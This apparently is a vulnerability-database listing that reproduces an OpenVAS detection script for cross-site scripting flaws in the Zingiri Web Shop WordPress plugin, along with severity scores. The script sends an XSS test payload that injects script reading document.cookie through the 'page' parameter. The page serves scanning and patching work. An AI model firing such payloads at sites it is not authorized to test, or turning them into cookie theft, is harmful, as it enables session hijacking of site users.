Lucene search

K
openvasCopyright (C) 2012 Greenbone AGOPENVAS:1361412562310902831
HistoryApr 27, 2012 - 12:00 a.m.

WordPress Zingiri Web Shop Plugin Multiple Cross Site Scripting Vulnerabilities

2012-04-2700:00:00
Copyright (C) 2012 Greenbone AG
plugins.openvas.org
13

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

AI Score

Confidence

High

0.008 Low

EPSS

Percentile

81.2%

WordPress Zingiri Web Shop Plugin is prone to multiple cross site scripting vulnerabilities.

# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:wordpress:wordpress";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.902831");
  script_version("2023-10-27T05:05:28+0000");
  script_cve_id("CVE-2012-6506");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_tag(name:"last_modification", value:"2023-10-27 05:05:28 +0000 (Fri, 27 Oct 2023)");
  script_tag(name:"creation_date", value:"2012-04-27 14:14:14 +0530 (Fri, 27 Apr 2012)");
  script_name("WordPress Zingiri Web Shop Plugin Multiple Cross Site Scripting Vulnerabilities");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_wordpress_http_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("wordpress/http/detected");

  script_xref(name:"URL", value:"http://1337day.com/exploits/18135");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/53278");
  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/18787");
  script_xref(name:"URL", value:"http://packetstormsecurity.org/files/112216/WordPress-Zingiri-Web-Shop-2.4.0-Cross-Site-Scripting.html");

  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to insert arbitrary HTML
  and script code, which will be executed in a user's browser session in the
  context of an affected site.");

  script_tag(name:"affected", value:"WordPress Zingiri Web Shop Plugin Version 2.4.0 and prior");

  script_tag(name:"insight", value:"Multiple flaws are due to improper validation of user-supplied input
  passed to 'page' and 'notes' parameters, which allows attackers to execute
  arbitrary HTML and script code in a user's browser session in the context
  of an affected site.");

  script_tag(name:"solution", value:"Upgrade to WordPress Zingiri Web Shop Plugin 2.4.1 or later.");

  script_tag(name:"summary", value:"WordPress Zingiri Web Shop Plugin is prone to multiple cross site scripting vulnerabilities.");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");

if(!port = get_app_port(cpe:CPE, service:"www"))
  exit(0);

if(!dir = get_app_location(cpe:CPE, port:port))
  exit(0);

if(dir == "/")
  dir = "";

url = dir + '/?page="><script>alert(document.cookie)</script>';

if(http_vuln_check(port:port, url:url, check_header:TRUE, pattern:"<script>alert\(document\.cookie\)</script>", extra_check:"Zingiri Web Shop")){
  report = http_report_vuln_url(port:port, url:url);
  security_message(port:port, data:report);
  exit(0);
}

exit(99);

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

AI Score

Confidence

High

0.008 Low

EPSS

Percentile

81.2%

Related for OPENVAS:1361412562310902831